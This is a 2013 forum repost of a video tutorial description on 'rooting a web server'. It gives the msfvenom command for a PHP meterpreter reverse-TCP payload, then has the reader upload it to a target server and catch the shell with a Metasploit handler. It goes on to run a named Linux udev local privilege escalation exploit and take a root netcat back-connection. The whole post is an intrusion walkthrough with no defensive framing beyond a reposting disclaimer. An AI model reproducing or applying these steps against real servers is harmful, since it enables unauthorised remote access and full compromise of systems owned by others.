Kwelwild Posted March 11, 2013 Report Posted March 11, 2013 Description: Hey my friends today I made a small tutorial on rooting a web server using metasploit. I hope you know to create metasploit backdoor executables. Here we use the same theory but our payload is php/meterpreter_reverse_tcp. As we need a back connection to our PC we use a reverse connection. So the parameter should be like this.msfvenom –p php/meterpreter_reverse_tcp LHOST=[ local IP ] LPORT=[Local Port ] –f rawWe need a raw output so we use the format as raw. Now our php meterpreter reverse connection is created but you have to delete the ‘#’ character at the line 1 to run this script correctly. Okay now run msfconsole and use exploit/multi/handler with the LHOST and LPORT and exploit. Here in this video I have used msfcli which is the same but has advanced features automation features of metasploit. By now our framework should start listening. Next upload our php script to the server and load it.Yeah, you should get a successful meterpreter session opened. We cannot use all the meterpreter commands as our payload is in php, hence we have limited meterpreter commands. Now run shell and there you go. As usual the normal procedure of compiling a local root exploit and executing can be done here. But in this example my kernel is 2.6.24-16 so I will use Linux 2.6 Udev Local Privilege Escalation Exploit Linux Kernel 2.6 UDEV < 141 Local Privilege Escalation Exploit . We should run this exploit like this./exploit PID of Udev-1Next after successful exploitation our payload in /tmp/run will be executed as root, so in this case I will be using a simple netcat back connection as my payload. That is it just listen using NC and you should get a successful back connection and you are the root.Un0wn_XThank You.Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying.Original Source: Surs?: Rooting A Server Using Metasploit Back Connection Quote
